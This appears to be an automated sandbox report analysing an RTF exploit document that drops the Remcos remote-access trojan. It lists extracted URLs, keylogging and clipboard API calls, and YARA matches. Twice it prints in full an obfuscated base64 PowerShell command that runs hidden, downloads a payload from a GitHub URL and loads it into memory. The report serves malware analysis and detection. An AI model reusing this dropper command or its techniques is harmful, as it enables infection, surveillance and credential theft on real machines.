              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
              Source: powershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: powershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.388756607.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.388756607.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: RegAsm.exe, 0000000D.00000002.388740433.000000000031C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/GK
              Source: RegAsm.exe, 0000000D.00000002.388756607.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: RegAsm.exe, 0000000D.00000002.388756607.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://www.msn.com/
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://www.msn.com/?ocid=iehp
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
              Source: RegAsm.exe, 0000000B.00000002.392273744.0000000000292000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: RegAsm.exe, 0000000D.00000002.388756607.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: bhvD26D.tmp.11.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
              Source: bhvD26D.tmp.11.drString found in binary or memory: https://contextual.media.net/
              Source: bhvD26D.tmp.11.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
              Source: bhvD26D.tmp.11.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
              Source: bhvD26D.tmp.11.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
              Source: bhvD26D.tmp.11.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
              Source: powershell.exe, 00000008.00000002.381523200.0000000003509000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000008.00000002.381523200.0000000003509000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000008.00000002.381523200.0000000003509000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: bhvD26D.tmp.11.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
              Source: bhvD26D.tmp.11.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
              Source: bhvD26D.tmp.11.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
              Source: bhvD26D.tmp.11.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: bhvD26D.tmp.11.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
              Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, 00000008.00000002.381523200.0000000003509000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: bhvD26D.tmp.11.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
              Source: powershell.exe, 00000008.00000002.380584613.0000000002619000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
              Source: powershell.exe, 00000008.00000002.380584613.0000000002619000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.383299018.0000000004FB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
              Source: powershell.exe, 00000008.00000002.380584613.0000000002619000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtsg1;
              Source: bhvD26D.tmp.11.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
              Source: powershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
              Source: bhvD26D.tmp.11.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
              Source: RegAsm.exe, 0000000B.00000002.392677961.0000000002608000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
              Source: bhvD26D.tmp.11.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
              Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.388756607.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: bhvD26D.tmp.11.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
              Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,000000009_2_0040A2B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,9_2_0040B70E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,9_2_004168C1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,11_2_0040987A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_004098E2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_00406DFC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,12_2_00406E9F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004068B5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_004072B5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,9_2_0040B70E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,9_2_0040A3E0

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.3b90b60.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.3b90b60.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.886651440.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.886651440.00000000008F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.381523200.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3596, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3728, type: MEMORYSTR

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041C9E2 SystemParametersInfoW,9_2_0041C9E2

              System Summary

              barindex
              Source: MKWbWHd5Ni.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
              Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 8.2.powershell.exe.3b90b60.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 8.2.powershell.exe.3b90b60.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 8.2.powershell.exe.3b90b60.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 8.2.powershell.exe.3b90b60.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 8.2.powershell.exe.3b90b60.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000008.00000002.381523200.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 3488, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 3596, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 3596, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: RegAsm.exe PID: 3728, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFZlUmJvc2VQUkVmRVJFTmNFLlRvU3RSaW5HKClbMSwzXSsneCctSm9pbicnKSggKCdnJysnMjgnKyd1cmwnKycgPScrJyBzZzFodHQnKydwJysnczovL3Jhdy4nKydnaScrJ3RodWJ1JysncycrJ2VyYycrJ28nKyduJysndGUnKydudC5jb20nKycvTicrJ28nKydEZScrJ3RlYycrJ3RPbicrJy9Ob0QnKydlJysndGVjdE9uL3JlZnMvaGUnKydhZHMvbWFpbi8nKydEZXQnKydhaCcrJ05vJysndGgtJysnVi50eHRzZzE7JysnIGcyJysnOCcrJ2InKydhc2U2JysnNENvbnQnKydlJysnbicrJ3QgPScrJyAnKycoTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTicrJ2UnKyd0LldlJysnYicrJ0NsaWVuJysndCcrJykuJysnRCcrJ293bmxvJysnYScrJ2RTJysndHJpbicrJ2coZzI4dXJsKTsgJysnZzInKyc4YmluYScrJ3J5Q29udCcrJ2UnKyduJysndCA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb20nKydCJysnYXNlJysnNjQnKydTdCcrJ3JpbmcoZzInKyc4YmFzZTY0JysnQ28nKyduJysndGUnKydudCknKyc7ICcrJ2cyOCcrJ2FzJysnc2VtYmx5ICcrJz0nKycgWycrJ1JlZicrJ2xlJysnYycrJ3QnKydpb24nKycuQScrJ3NzZW1ibHknKyddOjpMb2FkJysnKGcyOGJpbmFyJysneUNvJysnbnQnKydlbnQpOyBbZG5saWIuSU8uSCcrJ28nKydtZV06OlYnKydBSScrJyhoJysnRGonKyd0eHQuRkZSJysnUkVXLycrJzAnKyc1Ni8zJysnMTEnKycuMScrJzUyLjMnKyc4JysnLjE1Ly86JysncCcrJ3R0JysnaGhEJysnaiwgaCcrJ0QnKydqJysnZGUnKydzYXRpdicrJ2FkJysnb2hEaicrJywgaEQnKydqZCcrJ2VzYXQnKydpJysndmFkJysnb2hEaiwgaERqZCcrJ2UnKydzJysnYXQnKydpdmFkJysnb2hEaiwnKycgJysnaERqUicrJ2VnQXNtaEQnKydqJysnLCBoRGpoRGosJysnaCcrJ0QnKydqaERqJysnKScpLlJlcExhQ0UoJ2hEaicsW1N0UklOZ11bQ0hBcl0zNCkuUmVwTGFDRSgnZzI4JywnJCcpLlJlcExhQ0UoJ3NnMScsW1N0UklOZ11bQ0hBcl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFZlUmJvc2VQUkVmRVJFTmNFLlRvU3RSaW5HKClbMSwzXSsneCctSm9pbicnKSggKCdnJysnMjgnKyd1cmwnKycgPScrJyBzZzFodHQnKydwJysnczovL3Jhdy4nKydnaScrJ3RodWJ1JysncycrJ2VyYycrJ28nKyduJysndGUnKydudC5jb20nKycvTicrJ28nKydEZScrJ3RlYycrJ3RPbicrJy9Ob0QnKydlJysndGVjdE9uL3JlZnMvaGUnKydhZHMvbWFpbi8nKydEZXQnKydhaCcrJ05vJysndGgtJysnVi50eHRzZzE7JysnIGcyJysnOCcrJ2InKydhc2U2JysnNENvbnQnKydlJysnbicrJ3QgPScrJyAnKycoTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTicrJ2UnKyd0LldlJysnYicrJ0NsaWVuJysndCcrJykuJysnRCcrJ293bmxvJysnYScrJ2RTJysndHJpbicrJ2coZzI4dXJsKTsgJysnZzInKyc4YmluYScrJ3J5Q29udCcrJ2UnKyduJysndCA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb20nKydCJysnYXNlJysnNjQnKydTdCcrJ3JpbmcoZzInKyc4YmFzZTY0JysnQ28nKyduJysndGUnKydudCknKyc7ICcrJ2cyOCcrJ2FzJysnc2VtYmx5ICcrJz0nKycgWycrJ1JlZicrJ2xlJysnYycrJ3QnKydpb24nKycuQScrJ3NzZW1ibHknKyddOjpMb2FkJysnKGcyOGJpbmFyJysneUNvJysnbnQnKydlbnQpOyBbZG5saWIuSU8uSCcrJ28nKydtZV06OlYnKydBSScrJyhoJysnRGonKyd0eHQuRkZSJysnUkVXLycrJzAnKyc1Ni8zJysnMTEnKycuMScrJzUyLjMnKyc4JysnLjE1Ly86JysncCcrJ3R0JysnaGhEJysnaiwgaCcrJ0QnKydqJysnZGUnKydzYXRpdicrJ2FkJysnb2hEaicrJywgaEQnKydqZCcrJ2VzYXQnKydpJysndmFkJysnb2hEaiwgaERqZCcrJ2UnKydzJysnYXQnKydpdmFkJysnb2hEaiwnKycgJysnaERqUicrJ2VnQXNtaEQnKydqJysnLCBoRGpoRGosJysnaCcrJ0QnKydqaERqJysnKScpLlJlcExhQ0UoJ2hEaicsW1N0UklOZ11bQ0hBcl0zNCkuUmVwTGFDRSgnZzI4JywnJCcpLlJlcExhQ0UoJ3NnMScsW1N0UklOZ11bQ0hBcl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,9_2_004180EF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,9_2_004132D2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle,9_2_0041BB09
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle,9_2_0041BB35
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00401806 NtdllDefWindowProc_W,11_2_00401806
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004018C0 NtdllDefWindowProc_W,11_2_004018C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004016FD NtdllDefWindowProc_A,12_2_004016FD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004017B7 NtdllDefWindowProc_A,12_2_004017B7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00402CAC NtdllDefWindowProc_A,13_2_00402CAC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00402D66 NtdllDefWindowProc_A,13_2_00402D66
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,9_2_004167B4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043E0CC9_2_0043E0CC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041F0FA9_2_0041F0FA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004541599_2_00454159
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004381689_2_00438168
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004461F09_2_004461F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043E2FB9_2_0043E2FB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0045332B9_2_0045332B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0042739D9_2_0042739D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004374E69_2_004374E6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043E5589_2_0043E558
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004387709_2_00438770
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004378FE9_2_004378FE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004339469_2_00433946
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0044D9C99_2_0044D9C9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00427A469_2_00427A46
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041DB629_2_0041DB62
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00427BAF9_2_00427BAF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00437D339_2_00437D33
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00435E5E9_2_00435E5E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00426E0E9_2_00426E0E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043DE9D9_2_0043DE9D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00413FCA9_2_00413FCA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00436FEA9_2_00436FEA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_100171949_2_10017194
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1000B5C19_2_1000B5C1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044B04011_2_0044B040
